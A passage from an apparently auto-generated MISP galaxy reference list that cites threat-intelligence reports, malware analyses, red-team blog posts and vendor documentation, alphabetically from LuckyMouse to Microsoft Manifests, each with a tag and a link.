Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.

The tag is: misp-galaxy:references="Securelist LuckyMouse June 2018"

Table 14294. Table References

Links

https://securelist.com/luckymouse-hits-national-data-center/86083/

lucr-3: Getting SaaS-y in the cloud

Ian Ahl. (2023, September 20). LUCR-3: Scattered Spider Getting SaaS-y In The Cloud. Retrieved September 20, 2023.

The tag is: misp-galaxy:references="lucr-3: Getting SaaS-y in the cloud"

Table 14295. Table References

Links

https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud

Permiso Scattered Spider 2023

Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.

The tag is: misp-galaxy:references="Permiso Scattered Spider 2023"

Table 14296. Table References

Links

https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud

Kaspersky LuminousMoth July 2021

Lechtik, M, and etl. (2021, July 14). LuminousMoth APT: Sweeping attacks for the chosen few. Retrieved October 20, 2022.

The tag is: misp-galaxy:references="Kaspersky LuminousMoth July 2021"

Table 14297. Table References

Links

https://securelist.com/apt-luminousmoth/103332/

Bitdefender LuminousMoth July 2021

Botezatu, B and etl. (2021, July 21). LuminousMoth - PlugX, File Exfiltration and Persistence Revisited. Retrieved October 20, 2022.

The tag is: misp-galaxy:references="Bitdefender LuminousMoth July 2021"

Table 14298. Table References

Links

https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited

Unit42 Luna Moth

Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.

The tag is: misp-galaxy:references="Unit42 Luna Moth"

Table 14299. Table References

Links

https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/

sygnia Luna Month

Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.

The tag is: misp-galaxy:references="sygnia Luna Month"

Table 14300. Table References

Links

https://blog.sygnia.co/luna-moth-false-subscription-scams

Zscaler Lyceum DnsSystem June 2022

Shivtarkar, N. and Kumar, A. (2022, June 9). Lyceum .NET DNS Backdoor. Retrieved June 23, 2022.

The tag is: misp-galaxy:references="Zscaler Lyceum DnsSystem June 2022"

Table 14301. Table References

Links

https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor

Kaspersky Lyceum October 2021

Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.

The tag is: misp-galaxy:references="Kaspersky Lyceum October 2021"

Table 14302. Table References

Links

https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf

CoinTicker 2019

Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="CoinTicker 2019"

Table 14303. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/

ESET Machete July 2019

ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.

The tag is: misp-galaxy:references="ESET Machete July 2019"

Table 14304. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf

synack 2016 review

Patrick Wardle. (2017, January 1). Mac Malware of 2016. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="synack 2016 review"

Table 14305. Table References

Links

https://www.synack.com/2017/01/01/mac-malware-2016/

objsee mac malware 2017

Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="objsee mac malware 2017"

Table 14306. Table References

Links

https://objective-see.com/blog/blog_0x25.html

Unit42 CookieMiner Jan 2019

Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved July 22, 2020.

The tag is: misp-galaxy:references="Unit42 CookieMiner Jan 2019"

Table 14307. Table References

Links

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

Unit 42 Mac Crypto Cookies January 2019

Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.

The tag is: misp-galaxy:references="Unit 42 Mac Crypto Cookies January 2019"

Table 14308. Table References

Links

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

MacKeeper Bundlore Apr 2019

Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.

The tag is: misp-galaxy:references="MacKeeper Bundlore Apr 2019"

Table 14309. Table References

Links

https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/

MalwareUnicorn macOS Dylib Injection MachO

Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="MalwareUnicorn macOS Dylib Injection MachO"

Table 14310. Table References

Links

https://malwareunicorn.org/workshops/macos_dylib_injection.html#5

macOS Hierarchical File System Overview

Tenon. (n.d.). Retrieved October 12, 2021.

The tag is: misp-galaxy:references="macOS Hierarchical File System Overview"

Table 14311. Table References

Links

http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553

Add List Remove Login Items Apple Script

kaloprominat. (2013, July 30). macos: manage add list remove login items apple script. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="Add List Remove Login Items Apple Script"

Table 14312. Table References

Links

https://gist.github.com/kaloprominat/6111584

macOS MS office sandbox escape

Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump. Retrieved August 20, 2021.

The tag is: misp-galaxy:references="macOS MS office sandbox escape"

Table 14313. Table References

Links

https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a

MDSec macOS JXA and VSCode

Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans with VSCode Extensions. Retrieved April 20, 2021.

The tag is: misp-galaxy:references="MDSec macOS JXA and VSCode"

Table 14314. Table References

Links

https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/

SentinelOne macOS Red Team

Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.

The tag is: misp-galaxy:references="SentinelOne macOS Red Team"

Table 14315. Table References

Links

https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/

Lockboxx ARD 2019

Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021.

The tag is: misp-galaxy:references="Lockboxx ARD 2019"

Table 14316. Table References

Links

http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html

nixCraft macOS PATH variables

Vivek Gite. (2023, August 22). MacOS – Set / Change $PATH Variable Command. Retrieved September 28, 2023.

The tag is: misp-galaxy:references="nixCraft macOS PATH variables"

Table 14317. Table References

Links

https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/

SensePost MacroLess DDE Oct 2017

Stalmans, E., El-Sherei, S. (2017, October 9). Macro-less Code Exec in MSWord. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="SensePost MacroLess DDE Oct 2017"

Table 14318. Table References

Links

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

Macro Malware Targets Macs

Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.

The tag is: misp-galaxy:references="Macro Malware Targets Macs"

Table 14319. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/

alientvault macspy

PETER EWANE. (2017, June 9). MacSpy: OS X RAT as a Service. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="alientvault macspy"

Table 14320. Table References

Links

https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service

reed thiefquest ransomware analysis

Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021.

The tag is: misp-galaxy:references="reed thiefquest ransomware analysis"

Table 14321. Table References

Links

https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/

Reed thiefquest fake ransom

Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 18, 2021.

The tag is: misp-galaxy:references="Reed thiefquest fake ransom"

Table 14322. Table References

Links

https://blog.malwarebytes.com/detections/osx-thiefquest/

Objective See Green Lambert for OSX Oct 2021

Sandvik, Runa. (2021, October 1). Made In America: Green Lambert for OS X. Retrieved March 21, 2022.

The tag is: misp-galaxy:references="Objective See Green Lambert for OSX Oct 2021"

Table 14323. Table References

Links

https://objective-see.com/blog/blog_0x68.html

Trend Micro FIN6 October 2019

Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020.

The tag is: misp-galaxy:references="Trend Micro FIN6 October 2019"

Table 14324. Table References

Links

https://www.trendmicro.com/en_us/research/19/j/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops.html

Unit 42 Magic Hound Feb 2017

Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.

The tag is: misp-galaxy:references="Unit 42 Magic Hound Feb 2017"

Table 14325. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/

AMD Magic Packet

AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021.

The tag is: misp-galaxy:references="AMD Magic Packet"

Table 14326. Table References

Links

https://www.amd.com/system/files/TechDocs/20213.pdf

MagicWeb

Microsoft Threat Intelligence Center, Microsoft Detection and Response Team, Microsoft 365 Defender Research Team . (2022, August 24). MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="MagicWeb"

Table 14327. Table References

Links

https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/

FireEye FIN7 Oct 2019

Carr, N, et all. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques. Retrieved October 11, 2019.

The tag is: misp-galaxy:references="FireEye FIN7 Oct 2019"

Table 14328. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html

Microsoft Mail Flow Rules 2023

Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="Microsoft Mail Flow Rules 2023"

Table 14329. Table References

Links

https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules

GitHub MailSniper

Bullock, B., . (2018, November 20). MailSniper. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="GitHub MailSniper"

Table 14330. Table References

Links

https://github.com/dafthack/MailSniper

mailx man page

Michael Kerrisk. (2021, August 27). mailx(1p) — Linux manual page. Retrieved June 10, 2022.

The tag is: misp-galaxy:references="mailx man page"

Table 14331. Table References

Links

https://man7.org/linux/man-pages/man1/mailx.1p.html

enigma0x3 normal.dotm

Nelson, M. (2014, January 23). Maintaining Access with normal.dotm. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="enigma0x3 normal.dotm"

Table 14332. Table References

Links

https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/

NetSPI Startup Stored Procedures

Sutherland, S. (2016, March 7). Maintaining Persistence via SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.

The tag is: misp-galaxy:references="NetSPI Startup Stored Procedures"

Table 14333. Table References

Links

https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/

Makecab.exe - LOLBAS Project

LOLBAS. (2018, May 25). Makecab.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Makecab.exe - LOLBAS Project"

Table 14334. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Makecab/

Infoblox Lokibot January 2019

Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020.

The tag is: misp-galaxy:references="Infoblox Lokibot January 2019"

Table 14335. Table References

Links

https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence—​22

U.S. CISA PaperCut May 2023

Cybersecurity and Infrastructure Security Agency. (2023, May 11). Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG. Retrieved May 17, 2023.

The tag is: misp-galaxy:references="U.S. CISA PaperCut May 2023"

Table 14336. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a

GoBotKR

Zuzana Hromcová. (2019, July 8). Malicious campaign targets South Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.

The tag is: misp-galaxy:references="GoBotKR"

Table 14337. Table References

Links

https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/

ICEBRG Chrome Extensions

De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.

The tag is: misp-galaxy:references="ICEBRG Chrome Extensions"

Table 14338. Table References

Links

https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses

McAfee Malicious Doc Targets Pyeongchang Olympics

Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.

The tag is: misp-galaxy:references="McAfee Malicious Doc Targets Pyeongchang Olympics"

Table 14339. Table References

Links

https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/

Fortinet Fareit

Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.

The tag is: misp-galaxy:references="Fortinet Fareit"

Table 14340. Table References

Links

https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware

Microsoft OAuth Spam 2022

Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="Microsoft OAuth Spam 2022"

Table 14341. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/

Zscaler Kasidet

Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="Zscaler Kasidet"

Table 14342. Table References

Links

http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html

SilentBreak Outlook Rules

Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved February 4, 2019.

The tag is: misp-galaxy:references="SilentBreak Outlook Rules"

Table 14343. Table References

Links

https://silentbreaksecurity.com/malicious-outlook-rules/

Webroot PHP 2011

Brandt, Andrew. (2011, February 22). Malicious PHP Scripts on the Rise. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="Webroot PHP 2011"

Table 14344. Table References

Links

https://www.webroot.com/blog/2011/02/22/malicious-php-scripts-on-the-rise/

CISA ComRAT Oct 2020

CISA. (2020, October 29). Malware Analysis Report (AR20-303A). Retrieved December 9, 2020.

The tag is: misp-galaxy:references="CISA ComRAT Oct 2020"

Table 14345. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a

Malware Analysis Report ComRAT

CISA. (2020, October 29). Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 – PowerShell Script: ComRAT. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Malware Analysis Report ComRAT"

Table 14346. Table References

Links

https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a

CISA Zebrocy Oct 2020

CISA. (2020, October 29). Malware Analysis Report (AR20-303B). Retrieved December 9, 2020.

The tag is: misp-galaxy:references="CISA Zebrocy Oct 2020"

Table 14347. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b

CISA Supernova Jan 2021

CISA. (2021, January 27). Malware Analysis Report (AR21-027A). Retrieved February 22, 2021.

The tag is: misp-galaxy:references="CISA Supernova Jan 2021"

Table 14348. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a

UK NCSC Jaguar Tooth April 18 2023

National Cyber Security Centre. (2023, April 18). Malware Analysis Report: Jaguar Tooth. Retrieved August 23, 2023.

The tag is: misp-galaxy:references="UK NCSC Jaguar Tooth April 18 2023"

Table 14349. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/jaguar-tooth/NCSC-MAR-Jaguar-Tooth.pdf

US-CERT SHARPKNOT June 2018

US-CERT. (2018, March 09). Malware Analysis Report (MAR) - 10135536.11.WHITE. Retrieved June 13, 2018.

The tag is: misp-galaxy:references="US-CERT SHARPKNOT June 2018"

Table 14350. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf

US-CERT Bankshot Dec 2017

US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018.

The tag is: misp-galaxy:references="US-CERT Bankshot Dec 2017"

Table 14351. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF

US-CERT Volgmer 2 Nov 2017

US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.

The tag is: misp-galaxy:references="US-CERT Volgmer 2 Nov 2017"

Table 14352. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF

US-CERT HARDRAIN March 2018

US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. Retrieved June 11, 2018.

The tag is: misp-galaxy:references="US-CERT HARDRAIN March 2018"

Table 14353. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf

US-CERT BADCALL

US-CERT. (2018, February 06). Malware Analysis Report (MAR) - 10135536-G. Retrieved June 7, 2018.

The tag is: misp-galaxy:references="US-CERT BADCALL"

Table 14354. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF

CISA MAR SLOTHFULMEDIA October 2020

DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020.

The tag is: misp-galaxy:references="CISA MAR SLOTHFULMEDIA October 2020"

Table 14355. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a

Kroll RawPOS Jan 2017

Nesbit, B. and Ackerman, D. (2017, January). Malware Analysis Report - RawPOS Malware: Deconstructing an Intruder’s Toolkit. Retrieved October 4, 2017.

The tag is: misp-galaxy:references="Kroll RawPOS Jan 2017"

Table 14356. Table References

Links

https://www.kroll.com/en/insights/publications/malware-analysis-report-rawpos-malware

VMRay OSAMiner dynamic analysis 2021

VMRAY. (2021, January 14). Malware Analysis Spotlight: OSAMiner Uses Run-Only AppleScripts to Evade Detection. Retrieved October 4, 2022.

The tag is: misp-galaxy:references="VMRay OSAMiner dynamic analysis 2021"

Table 14357. Table References

Links

https://www.vmray.com/cyber-security-blog/osaminer-uses-applescripts-evade-detection-malware-analysis-spotlight/

Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018

Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018"

Table 14358. Table References

Links

https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/

Alperovitch Malware

Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.

The tag is: misp-galaxy:references="Alperovitch Malware"

Table 14359. Table References

Links

http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/

Chrome Extension C2 Malware

Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved November 22, 2017.

The tag is: misp-galaxy:references="Chrome Extension C2 Malware"

Table 14360. Table References

Links

https://kjaer.io/extension-malware/

FireEye Kevin Mandia Guardrails

Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019.

The tag is: misp-galaxy:references="FireEye Kevin Mandia Guardrails"

Table 14361. Table References

Links

https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/

Karl Greenberg. (2023, April 20). Malware is proliferating, but detection measures bear fruit: Mandiant. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="TechRepublic M-Trends 2023"

Table 14362. Table References

Links

https://www.techrepublic.com/article/mandiant-malware-proliferating/

CTU BITS Malware June 2016

Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="CTU BITS Malware June 2016"

Table 14363. Table References

Links

https://www.secureworks.com/blog/malware-lingers-with-bits

CyberBit System Calls

Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="CyberBit System Calls"

Table 14364. Table References

Links

https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/

Malware Monday VBE

Bromiley, M. (2016, December 27). Malware Monday: VBScript and VBE Files. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Malware Monday VBE"

Table 14365. Table References

Links

https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16

RSAC 2015 San Francisco Patrick Wardle

Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="RSAC 2015 San Francisco Patrick Wardle"

Table 14366. Table References

Links

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Malware Persistence on OS X

Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.

The tag is: misp-galaxy:references="Malware Persistence on OS X"

Table 14367. Table References

Links

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

FireEye Hijacking July 2010

Harbour, N. (2010, July 15). Malware Persistence without the Windows Registry. Retrieved November 17, 2020.

The tag is: misp-galaxy:references="FireEye Hijacking July 2010"

Table 14368. Table References

Links

https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html

Mondok Windows PiggyBack BITS May 2007

Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="Mondok Windows PiggyBack BITS May 2007"

Table 14369. Table References

Links

https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/

Conficker Nuclear Power Plant

Cimpanu, C. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl’s 30th Anniversary. Retrieved February 18, 2021.

The tag is: misp-galaxy:references="Conficker Nuclear Power Plant"

Table 14370. Table References

Links

https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

MMPC ISAPI Filter 2012

MMPC. (2012, October 3). Malware signed with the Adobe code signing certificate. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="MMPC ISAPI Filter 2012"

Table 14371. Table References

Links

https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx

Leonardo Turla Penquin May 2020

Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021.

The tag is: misp-galaxy:references="Leonardo Turla Penquin May 2020"

Table 14372. Table References

Links

https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf

Malware System Language Check

Pierre-Marc Bureau. (2009, January 15). Malware Trying to Avoid Some Countries. Retrieved August 18, 2021.

The tag is: misp-galaxy:references="Malware System Language Check"

Table 14373. Table References

Links

https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/

JPCert TSCookie March 2018

Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.

The tag is: misp-galaxy:references="JPCert TSCookie March 2018"

Table 14374. Table References

Links

https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html

Symantec BITS May 2007

Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="Symantec BITS May 2007"

Table 14375. Table References

Links

https://www.symantec.com/connect/blogs/malware-update-windows-update

JPCert BlackTech Malware September 2019

Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020.

The tag is: misp-galaxy:references="JPCert BlackTech Malware September 2019"

Table 14376. Table References

Links

https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html

Unit 42 Rocke January 2019

Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="Unit 42 Rocke January 2019"

Table 14377. Table References

Links

https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/

Manage-bde.wsf - LOLBAS Project

LOLBAS. (2018, May 25). Manage-bde.wsf. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Manage-bde.wsf - LOLBAS Project"

Table 14378. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/

Microsoft Manage Device Identities

Microsoft. (2022, February 18). Manage device identities by using the Azure portal. Retrieved April 13, 2022.

The tag is: misp-galaxy:references="Microsoft Manage Device Identities"

Table 14379. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal

Microsoft MOF May 2018

Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved January 24, 2020.

The tag is: misp-galaxy:references="Microsoft MOF May 2018"

Table 14380. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format—​mof-

Microsoft Inbox Rules

Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.

The tag is: misp-galaxy:references="Microsoft Inbox Rules"

Table 14381. Table References

Links

https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59

Google Cloud Just in Time Access 2023

Google Cloud. (n.d.). Manage just-in-time privileged access to projects. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="Google Cloud Just in Time Access 2023"

Table 14382. Table References

Links

https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project

Microsoft Manage Mail Flow Rules 2023

Microsoft. (2023, February 22). Manage mail flow rules in Exchange Online. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="Microsoft Manage Mail Flow Rules 2023"

Table 14383. Table References

Links

https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/manage-mail-flow-rules

Office 365 Partner Relationships

Microsoft. (2022, March 4). Manage partner relationships. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Office 365 Partner Relationships"

Table 14384. Table References

Links

https://docs.microsoft.com/en-us/microsoft-365/commerce/manage-partners?view=o365-worldwide

TechNet Trusted Publishers

Microsoft. (n.d.). Manage Trusted Publishers. Retrieved March 31, 2016.

The tag is: misp-galaxy:references="TechNet Trusted Publishers"

Table 14385. Table References

Links

https://technet.microsoft.com/en-us/library/cc733026.aspx

Microsoft Enable Cred Guard April 2017

Lich, B., Tobin, J., Hall, J. (2017, April 5). Manage Windows Defender Credential Guard. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft Enable Cred Guard April 2017"

Table 14386. Table References

Links

https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-manage

Outlook File Sizes

  1. O’Bryan. (2018, May 30). Managing Outlook Cached Mode and OST File Sizes. Retrieved February 19, 2020.

The tag is: misp-galaxy:references="Outlook File Sizes"

Table 14387. Table References

Links

https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/

Microsoft Managing WebDAV Security

Microsoft. (n.d.). Managing WebDAV Security (IIS 6.0). Retrieved December 21, 2017.

The tag is: misp-galaxy:references="Microsoft Managing WebDAV Security"

Table 14388. Table References

Links

https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx

Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved January 10, 2016.

The tag is: misp-galaxy:references="Mandiant M Trends 2011"

Table 14389. Table References

Links

https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf

Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="Mandiant M Trends 2016"

Table 14390. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf

FireEye APT35 2018

Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.

The tag is: misp-galaxy:references="FireEye APT35 2018"

Table 14391. Table References

Links

https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf

Microsoft Manifests

Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft Manifests"

Table 14392. Table References

Links

https://msdn.microsoft.com/en-US/library/aa375365

MSDN Manifests

Microsoft. (n.d.). Manifests. Retrieved June 3, 2016.

